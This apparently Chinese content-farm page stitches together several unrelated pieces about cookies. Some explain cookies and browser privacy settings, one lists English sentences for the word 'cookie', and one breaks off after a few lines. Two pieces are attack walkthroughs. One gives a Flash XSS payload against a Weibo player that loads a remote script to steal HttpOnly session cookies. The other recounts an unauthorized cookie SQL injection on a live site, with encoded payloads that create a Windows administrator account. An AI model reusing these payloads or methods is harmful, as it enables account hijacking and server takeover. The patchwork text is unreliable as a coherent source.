什么是Cookie，Cookie数据泄漏的危害WEB安全

时间：2023-05-10 08:00:48 其他范文收藏本文下载本文

下面是小编整理的什么是Cookie，Cookie数据泄漏的危害WEB安全，本文共8篇，欢迎大家阅读分享借鉴，希望对大家有所帮助。

篇1：什么是Cookie，Cookie数据泄漏的危害WEB安全

一、什么是Cookie

简单来说，Cookie是网站在用户浏览器中保存下来的一份个人信息，有了Cookie，用户下次访问该网站时就可以免输入用户名甚至密码了（比如登陆淘宝网，用户名一栏就自动填充了，而为了安全，密码是必须的），因网站而异，另外，用户使用账号登陆网站后，要靠Cookie来维持会话Session，以保持在线状态，一旦清空当前网站对应的所有Cookie数据，用户将立即下线。真嗦，看图：

这是在OSChina登陆状态下的Cookie。接下来把它清除，然后刷新，结果如下：

可以看出，没有了Cookie，用户马上变成了游客身份，也就是用户维持登陆状态的信息已经不存在了。所以说，如果没有Cookie，许多网站都登陆不上去了。再比如，当用户访问京东等购物网站时，在不登陆的状态下，可以直接将选中的商品加入购物车，其原理也是基于Cookie来记录用户的购物车数据，只要不清除它，下次再打开该网站时，购物车依然能够显示添加的商品，

二、Cookie数据泄漏的危害

又以上面OSChina为例，如果我打开第二个浏览器（猎豹），以游客身份访问oschina.net，然后把之前浏览器（Chrome）Cookie中的oscid值取出来，注入第二个浏览器中，结果会怎么样呢。

通过脚本注入这个oscid值，然后刷新，即可看到，游客身份变成了在线用户。也就是说，有的网站就是通过一个或多个cookie值来映射到一个会员ID，只要任何一台电脑的任何一个浏览器中包含这些Cookie值，就可以实现会员自动登陆。当然，这个cookie值会有一个过期时间（由网站系统响应头决定），以保证一定的安全性，另外补充一点，oschina应该对cookie的oscid值禁用了js读取，以防网站未知的XSS跨站脚本漏洞导致用户账户被盗，所以为了演示的需要，我是从浏览器的设置功能中取出来的。

cookie的作用不小，给用户和网站经营者带来很大的便利，但同时不可避免带来一些安全隐忧，只要我们保持安全意识，不在公共电脑上登陆敏感账户，我们就能趋利避害，享受cookie。

篇2：cookie是可数吗

She fed him a cookie

她给他吃了一块饼干。

At the end of the meal, Amy was given a fortune cookie.

饭后,艾米得到了一块幸运饼干。

She really is a tough cookie.

她真正是个铁娘子。

That was Nicholas's cue to ask for another chocolate chip cookie.

那表示尼古拉斯还想要一块巧克力曲奇。

A young boy is standing on a stool, reaching for a cookie jar, and the stool is about to tip

一个小男孩正站在凳子上，伸手够一个曲奇罐子，凳子眼看就要歪了。

He's a tough cookie.

他是条硬汉子。

篇3： COOKIES盗取[flash编程安全+apache httponly cookie 泄漏利用]

最近突然觉得，很多FLASH开发人员在编写的时候，忽视了安全问题，

COOKIES盗取[flash编程安全+apache httponly cookie 泄漏利用]

。被恶意利用的话，可以实现URL跳转，COOKIES盗取，甚至是蠕虫攻击。

最近突然觉得，很多FLASH开发人员在编写的时候，忽视了安全问题。被恶意利用的话，可以实现URL跳转，COOKIES盗取，甚至是蠕虫攻击。

漏洞测试：IE , firefox , chrome(= = 这个输入测试代码，浏览器直接崩溃了)

漏洞成因：

1. 首先说的是FLASH编程安全问题：

一些编程人员，对于loaderInfo.parameters 所传入的参数都不会严格过滤，甚至很多开发人员都有把Javascript函数名作为参数传入的习惯。

而事实证明，新浪的开发人员也有类似的习惯。

2. 首先google 了一下inurl:(swf) site:weibo.com ，将搜索结果中的SWF全部下载下来。用ASV全部反编一下，得到若干txt文件，每个FLASH一个。

3. 漏洞利用条件：有parameters, 有ExternalInterface.call。我们以此2个关键词搜索上面得到的txt文件。

4. 最终锁定一个目标。tw.weibo.com/_common/jwplayer/player.swf

5. 其漏洞源码如下：

复制代码

代码如下:

//加载外部参数

this.loadFlashvars(RootReference.root.loaderInfo.parameters);

//写入参数

this.setConfigParam(param, params[param]);

//继续,可以看到参数写到了_config 里

this._config[_arg1.toLowerCase] = Strings.serialize(Strings.trim(_arg2));

//再搜索ExternalInterface.call，找到以下位置

var callbacks:* = (_player.config.playerready) ? ((_player.config.playerready + “,”) + “playerReady”) : “playerReady”;

if (ExternalInterface.available){

for each (callback in callbacks.replace(/\s/, “”).split(“,”)) {

try {

ExternalInterface.call(callback, {id:evt.id, client:evt.client, version:evt.version});

} catch(e:Error) {

};

clearQueuedEvents();

};

//可以看出call<--callback<--callbacks<---_player.config.playerready

6. 基于以上分析，我们可以很容易构造出利用代码。

tw.weibo.com/_common/jwplayer/player.swf?playerready=(function(){alert('xxx');})

7. 但是这样的代码，还不足以构成危害。顶多就是一个URL跳转。连cookies都是获取不到的。如以下代码，将返回[拒绝访问]的错误。

tw.weibo.com/_common/jwplayer/player.swf?playerready=(function(){try{alert(document.cookie)}catch(e){alert(e.description)}})

8. 突破限制，获取cookies，

正好昨天在百度javascript吧看到一片帖子href,src的妙用（tieba.baidu.com/p/1583718448）。正好拿来突破这种限制了。

(广告一下，喜欢javascript的可以经常来玩玩！！)。

利用文章中所讲技巧，构造以下代码：

tw.weibo.com/_common/jwplayer/player.swf?playerready=(function(){location.href='javascript.:“”'})

9. 从上面可以看出，弹出weibo.com的cookies里。但是当我拿这个cookies来发送微博的时候，发现不成功。比较了一下获取的cookies，发现SUS，SUE两个值是http-only的，也就是document.cookie得不到的。

10. 前些天看到有人发腾讯的apache cookie 泄漏漏洞，结果因为没有漏洞利用场景被忽略了。看了下tw.weibo.com的HTTP头，正好是apache的，我们这里可以尝试用一用了！！

从exploit-db下载了利用的JS，做了点小修改。如下，保存为appmaker.sinaapp.com/test3.js

11. 构造以下利用代码，调用上面这个JS文件。代码中的test.php为接收cookies的文件。

tw.weibo.com/_common/jwplayer/player.swf?playerready=(function(){location.href='javascript.:“”'})

编码一下，可以发到微博：

tw.weibo.com/_common/jwplayer/player.swf?playerready=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest3.js%5C'%3E%3C%2Fscript%3E%22'%7D)

12. 结果表明该服务器存在apache cookies泄漏漏洞，效果见漏洞证明。

------------------------------------------------------------

总结：

1. FLASH的编写安全不容忽视，实际上，我找到了10多个FLASH中，有2个FLASH可以被利用到。这说明这种漏洞不是偶然，而是被开发者忽略掉的一个问题。

另外一个不在weibo.com的域名下。提供给你们一起修复下吧!

js.t.sinajs.cn/t4/home/static/swf/img/SinaCollage.swf?JSHandler=(function(){alert('xxx')})

2. 本流程为apache cookies泄漏漏洞的利用，提供了一个利用场景。

漏洞证明：

1. 微博写入链接：

2. 点击链接后，抓包，见图

A. Apache cookies 泄漏图，其中包含有document.cookie无法获取到的SUS,SUE

B. 可以看到Cookies被转发到我们指定的PHP文件中。

3. 利用Cookies在SAE发送微博失败。。提示是

“抱歉，你当前使用的账号、IP或应用由于违反了的安全检测规则，暂时无法完成此操作啦。你可以绑定手机来取消此限制，如有问题@微博客服反馈。” 可能做了某些其他限制。

修复方案：

1. 审查已上线的FLASH文件代码，严格控制FLASH文件参数的输入

2. apache的漏洞给打补丁。

篇4：如何巧妙禁止Cookie 保证上网安全

cookie的作用很多人都知道――cookie里面保存着我们所浏览过的网页的记录，假若让别有用心的人看到了这些信息，他们就达到了刺探信息的目的，现在针对cookie的攻击不在少数，这些黑手通过下载网络数据库的方法下载本地计算机上的cookie，包括我们的浏览信息，我们的服务器后台信息，我们的管理员账号甚至我们的银行密码等等，

还有一些利用社会工程学的盗窃手法，比如通过对你的cookie的刺探盗取你的qq号码等等，这样虽然你可以通过申诉找回来，但是难免你的qq好友都被人删除，还有我们的游戏账号和密码，这个是很多人都十分关心的，cookie就记录着这样的登陆信息，如果我们任由这只黑手胡作非为，谁知道将来会出什么事呢，虽然网络上的东西是虚拟的，但是望着自己辛苦得来的装备跑到别人的腰包里，你会作何打算?

很多人为了“安全”，他们坚持每天用完电脑及时清理ie的缓存文件，删除cookie的工作。不得不佩服每天这样做的毅力，但却有个事实却不可否认――每天这么做，太麻烦了。那么如何简单却又能有效地防止别人利用cookie刺探我们呢?

直接对cookie禁用就可以达到上述目的。目前有三种方式可供你选择：

一、IE选项法

1、启动IE;

2、在“工具”菜单上，单击“Internet选项”，打开“Internet选项”对话框;

3、单击“隐私”选项卡，将滑块上移到更高的隐私级别。如果移动到最顶端则是选择“阻止所有的Cookie”，此时系统将阻止所有网站的Cookie，而且网站不能读取计算机上已有的Cookie;

4、单击“确定”按钮。

二、属性设置法

当然，上述的“IE选项法”笔者是在IE6中操作完成，如果你用的是IE5，那么请在“Internet选项”对话框中“安全”选项卡上进行设置，在 IE4中又有所不同，

而下述的“属性设置法”把保存Cookie的文件夹设置为“只读”属性，从而网站也就无法向其中写入Cookie信息了。该法适用于各种版本的IE。

1、启动“Windows资源管理器”;

2、找到保存Cookie的文件夹。使用Windows版本不同，保存Cookie的文件夹会有所不同。比如，在Windows XP中，该文件夹为“C：Documents and tings用户名Cookies”文件夹;在Windows 98中，是“C：WindowsCookies”文件夹;

3、右键单击该文件夹，再单击“属性”，打开文件夹属性对话框，选中“只读”复选框，指定此文件夹中的文件为只读属性，只读意味着文件不能被更改或意外删除;

4、单击“确定”按钮。

三、注册表法

“属性设置法”实际上也有缺陷，就是网站照样可以读取计算机上已有的Cookie，而且有一些特殊Cookie不是以文本文件形式存在，而是保存在内存中。这类Cookie通常是用户在访问某些特殊网站时，由系统自动在内存中生成，一旦访问者离开该网站又自动将Cookie从内存中删除。上述两法对这些 Cookie就无能为力了，而“注册表法”可以弥补这些不足。

1、单击“开始”菜单，再单击“运行”，然后在“打开”框中键入“regedit”，单击“确定”按钮，打开“注册表编辑器”窗口;

2、依次展开“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet tingsCacheSpecial PathsCookies”分支，右键单击“Cookies”，然后单击快捷菜单中的“删除”命令，当系统提示确认删除时，请单击“是”按钮;

3、关闭“注册表编辑器”窗口

为了防止一些网站将Cookie文件放到你的计算机中，除了如上所述手动进行设置外，还有一个简便的方法是安装软件来保护你的Cookie文件。这类软件比较多，你可以到各大软件下载站点去下载。

篇5：Cookie注入是怎样产生的

style=“display:block;padding:0px 10px;” class=“ContentFont”>作者：啊D

现在很多网站都加了防注入系统代码，你输入注入语句将无法注入~~感觉这样的防注入系统不错，但防注入系统没有注意到 Cookies 的问题！所以就有了Cookies注入~~

我们来研究一下怎样情况下才会有Cookies注入!如果你学过ASP你应该会知道

篇6：推荐:另类的注射攻击cookie注射脚本安全

一、目标的锁定

MSN上朋友icerover发信息过来问我些关于cookie注射的问题,刚好那时读蚂蚁影院系统的代码,也正好发现了其chageusr.asp. 存在cookie注射漏洞，这里简要分析其代码:

====================code==========================

<% if request.cookies(“userid”)=“” or request.cookies(“password”)=“” then //首先要保证我们的cookie中userid和password的值不为空

response.write“”

end if

if request.cookies(“oktt”)=“yes” then

response.write“”

end if

dim rs

dim sql

set rs=server.createobject(“adodb.recordset”)

sql=“select * from users where userid='”&request.cookies(“userid”)&“' and password='”&request.cookies(“password”)&“'” //sql语句中可以看到userid和password的查询是来自客户端的cookie,并且没有验证

rs.open sql,conn,1,3

id=rs(“id”)

userid=rs(“userid”)

password=rs(“password”)

name=rs(“name”)

email=rs(“email”)

sex=rs(“sex”)

Province=rs(“Province”)

dat=rs(“date”)

====================code==========================

通过上面的简要分析我们可以知道,userid和password并没有过滤,userid和password全来自客户端的cookie,所以我们只要在客户端中的cookie构造注射语句就可以进行注射.

怎么利用这里暂不介绍,下面会提到.

朋友告诉我,有一个站www.chinaxxx.net其member.asp存在cookie注射漏洞,其权限为sa.

二、渗透之旅

下面为其member.asp的代码:

====================code==========================

Response.CacheControl = “no-cache”

Email = Request.Cookies(“Email”)

Userid = Request.Cookies(“Userid”)

if Len(Email)=0 then Response.Redirect “login.htm”

if Len(Email)>3 then

set bjConn = Server.CreateObject(“ADODB.Connection”)

objConn.Open strQ

strQ = “select * from tb_users where usertype>0 and email='” &Email & “' and Userid=” &Userid

set bjRs = Server.CreateObject(“ADODB.Recordset”)

objRs.Open strQ,objConn,1,3

if not objRs.EOF then

ExpDays = DateDiff(“d”,now,objRs(“expdate”))

ExpDate = FormatDateTime(objRs(“expdate”),2)

Username = objRs(“Username”)

if ExpDays<=0 then

objRs(“usertype”) = 3

ExpDays = 0

else

objRs(“usertype”) = 9

end if

objRs.Update

====================code==========================

通过上面的代码Userid = Request.Cookies(“Userid”)等等,我们可以知道其userid和email的值是来客户端的cookie,再跟踪一下会发现其cookie并没有过滤,而是

strQ = “select * from tb_users where usertype>0 and email='” &Email & “' and Userid=” &Userid

直接查询,所以这个时候我们只要在cookie里面构造正确的语句就可以搞定这个站点,sa权限可以让我们….嘿嘿

三、cookie注射注意点

1.;符号,在cookie里,各个变量间的是用;来区分的,所以你的注射语句里面不要乱含有;,如果你含有的话,可能会导致你的注射语句出错.

2.空格符号,在cookie里,会自动过滤掉空格,所以你的注射语句里面要注意转换

该注意的地方也差不多了,现在我们开始我们的注射之旅吧.

四、我注,我注,我注注注

其member.asp需要登陆,登陆后其cookie如下

Userid=5581;email=icerover%40msn%2Ecom; ASPSESSIONIDASARRRTT=OMOIFPICADICDLAMAKOGCNNH

变换一下位置,方便注射

email=icerover%40msn%2Ecom; ASPSESSIONIDASARRRTT=OMOIFPICADICDLAMAKOGCNNH; Userid=5581;

查一下版本:

把 and 1=(select @@version);--解码一下,转换如下:

%20%61%6E%64%20%31%3D%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%3B%2D%2D

整个cookie变换成

email=icerover%40msn%2Ecom; ASPSESSIONIDASARRRTT=OMOIFPICADICDLAMAKOGCNNH; Userid=5581%20%61%6E%64%20%31%3D%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%3B%2D%2D

;

得到回显如图一:

扫描其端口发现开了3389,直接加个用户,注射如下:

转换语句:

;declare @s varchar(21) set @s='wscript.shell'declare @o int exec sp_oacreate @s,@o out exec sp_oamethod @o,'run',NULL,'net.exe user linzi linzihk /add';exec sp_oamethod @o,'run',NULL,'net.exe localgroup administrators linzi /add';--

如下:

%3B%64%65%63%6C%61%72%65%20%40%73%20%76%61%72%63%68%61%72%28%32%31%29%20%73%65%74%20%40%73%3D%27%77%73%63%72%69%70%74%2E%73%68%65%6C%6C%27%64%65%63%6C%61%72%65%20%40%6F%20%69%6E%74%20%65%78%65%63%20%73%70%5F%6F%61%63%72%65%61%74%65%20%40%73%2C%40%6F%20%6F%75%74%20%65%78%65%63%20%73%70%5F%6F%61%6D%65%74%68%6F%64%20%40%6F%2C%27%72%75%6E%27%2C%4E%55%4C%4C%2C%27%6E%65%74%2E%65%78%65%20%75%73%65%72%20%78%69%61%6F%6C%75%20%6C%69%6E%7A%69%68%6B%20%2F%61%64%64%27%3B%65%78%65%63%20%73%70%5F%6F%61%6D%65%74%68%6F%64%20%40%6F%2C%27%72%75%6E%27%2C%4E%55%4C%4C%2C%27%6E%65%74%2E%65%78%65%20%6C%6F%63%61%6C%67%72%6F%75%70%20%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%73%20%78%69%61%6F%6C%75%20%2F%61%64%64%27%3B%2D%2D

修改cookie如下:

email=icerover%40msn%2Ecom; ASPSESSIONIDASARRRTT=OMOIFPICADICDLAMAKOGCNNH; Userid=5581%3B%64%65%63%6C%61%72%65%20%40%73%20%76%61%72%63%68%61%72%28%32%31%29%20%73%65%74%20%40%73%3D%27%77%73%63%72%69%70%74%2E%73%68%65%6C%6C%27%64%65%63%6C%61%72%65%20%40%6F%20%69%6E%74%20%65%78%65%63%20%73%70%5F%6F%61%63%72%65%61%74%65%20%40%73%2C%40%6F%20%6F%75%74%20%65%78%65%63%20%73%70%5F%6F%61%6D%65%74%68%6F%64%20%40%6F%2C%27%72%75%6E%27%2C%4E%55%4C%4C%2C%27%6E%65%74%2E%65%78%65%20%75%73%65%72%20%78%69%61%6F%6C%75%20%6C%69%6E%7A%69%68%6B%20%2F%61%64%64%27%3B%65%78%65%63%20%73%70%5F%6F%61%6D%65%74%68%6F%64%20%40%6F%2C%27%72%75%6E%27%2C%4E%55%4C%4C%2C%27%6E%65%74%2E%65%78%65%20%6C%6F%63%61%6C%67%72%6F%75%70%20%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%73%20%78%69%61%6F%6C%75%20%2F%61%64%64%27%3B%2D%2D;

得到回显如图二:

虽然显示占线，但已经执行成功，开了TS，直接用3389登陆器登上去，bingo!拿下站点.

五、总结:

无语，大家自己去体会!~~~

篇7：了解cookie 火狐助你保护隐私安全

cookie到底是什么？它会不会危害我们的上网安全，泄露隐私？普通用户应该怎样才能更好地在浏览互联网时保护自己的隐私，确保安全？下面我们一起来揭晓这些问题的答案，

什么是cookie？

网站在用户的电脑中将用户信息保存在cookie文件中。下次再访问这个网站的时候，代码会去读这个文件，让网站记得你。其实，我们一直以来都非常依赖于cookie。比如，当你访问一个网站时，这个网站记得你的用户名和密码，这就是通过cookie来实现的。当然，有些cookie会记住更多关于用户的详细信息，比如你的兴趣，你的浏览方式等等。有些cookie会一直追踪用户直到关掉浏览器。还有些cookie会一直追踪到用户删除掉它们为止。总体来说，cookie并不会损害你的计算机和你的利益，但是用户的信息确实存放于此。

有了cookie，也就意味着网站可以获得浏览过它的用户的信息，继而也可以基于这些信息提供给用户更为精准的内容，这种广告形式一般被称为精准广告。还有一种类型的cookie，叫做第三方cookie，可以追踪用户并没有访问过的网站并收集关于用户的信息，然后将这些信息卖给广告商以便给用户推送精准广告。这个就是今年315晚会曝光的隐私安全问题。

以上我们讨论的都是浏览器中的cookie。事实上，还有一种Flash cookie，也就是记录用户在访问Flash网页的时候保留的信息。由于目前各大网站还在普遍的使用Flash技术，因此Flash cookie也很常见，并且目前无法通过浏览器中的清除cookie操作来彻底删除。

现在，我们了解了什么是cookie、cookie的类型以及它和隐私安全之间的关系，下面就和大家来分享下如何来通过浏览器的设置和扩展功能，更好的保护自己的隐私安全。

开启“请勿追踪”(Do Not Track)功能

“请勿追踪”，顾名思义，请网站不要追踪用户的信息，

这一功能是通过需要浏览器和网站共同来支持才可真正生效。火狐最先将“请勿追踪”(Do Not Track)功能内置在浏览器中，火狐用户可以在选项->隐私中进行设置。这一功能现在已经被各大浏览器厂商内置在自己的产品中， Twitter等大型网站已经率先支持这一功能，但目前很多网站对“请勿追踪”的支持还非常有限。

定期清理浏览器中的cookie

不希望被第三方机构推送精准广告的用户，可以选择手动操作来定期清理自己的cookie。操作很简单，在火狐中找到选项->隐私，删除私人cookie即可(快捷键ctrl+shift+del)。想要省事的用户也可以在选项->隐私中设置每次关闭火狐时自动清理cookie。

此外，未来火狐也将会在正式版本中加入对第三方cookie的自定义设置，例如默认拦截第三方cookie等等，为用户提供更多控制权(这一功能目前仅限在火狐的每夜版Nightly中启用)。

使用Betterprivacy扩展，清理Flash cookie

上文中提到过，Flash cookie不同于浏览器cookie，在默认情况下任何浏览器都无法直接删除Flash cookie。但是火狐浏览器中有一款强大的扩展：Betterprivacy，可以让火狐像操作浏览器cookie一样操作Flash cookie，将其彻底删除。

扩展安装地址：mozilla.com.cn/addon/316-betterprivacy/

另外，火狐也即将在正式版中启用 click to play功能，默认禁用插件运行，隐藏Flash无法自动运行，也无法再通过Flash cookie跟踪用户。

点击阅读更多学院相关文章>>

分享到